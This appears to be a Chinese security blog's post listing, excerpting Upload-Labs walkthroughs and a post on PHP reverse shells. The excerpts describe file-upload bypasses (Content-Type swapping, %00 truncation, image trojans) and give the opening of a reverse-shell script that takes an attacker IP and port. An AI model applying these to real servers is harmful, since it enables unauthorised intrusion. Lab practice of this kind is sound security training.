Web-Lab
功到自然成!
痴人说梦梦中人
先打一拳再说
展开
-
Upload-Labs回顾上篇(1-10节)
第一关:前段校验①:可以尝试修改about:config配置,将JavaScript设置为False,直接上传.php文件了。②:或者先上传允许的文件,再抓包删除标记的.jpg,然后forward即可。核心就是绕过前段验证即可。貌似00截断也可以。第二关:content type绕过替换标记的content type 类型为image/jpeg即可上传成功,源码里提示是image/jpeg...原创 2019-09-24 15:36:35 · 296 阅读 · 0 评论 -
Upload-Labs回顾下篇(11-20节)
第十一关:%00截断源码中保存路径是通过参数传递的,可以使用%00截断代码读取的文件扩展名(截断的就是波浪线那块代码生成的文件名),自己设置文件名和扩展名。有两个利用条件:① php版本小于5.3.4②php魔术引号关闭第十二关:00截断十二关采用POST传输存储路径,而POST不会对%00进行URL解码,所以需要在抓包的hex中修改为0x00,从而进行内存截断。第十三关:图片马制作c...原创 2019-09-25 22:35:24 · 233 阅读 · 0 评论 -
PHP反弹shell
步骤详解:前提:①、PHPStudy开启相关服务。②、假设木马已上传至服务器且可以访问(即执行代码才能反弹shell)。③、攻击机器和受害服务器要处于同一网段。1、划线为攻击机的IP+端口。2、攻击机监听自身端口4444,即可获取执行shell。<?php set_time_limit(0); $ip=$_POST['ip'];$port=$_POST['port'];...原创 2019-09-26 18:46:27 · 7508 阅读 · 0 评论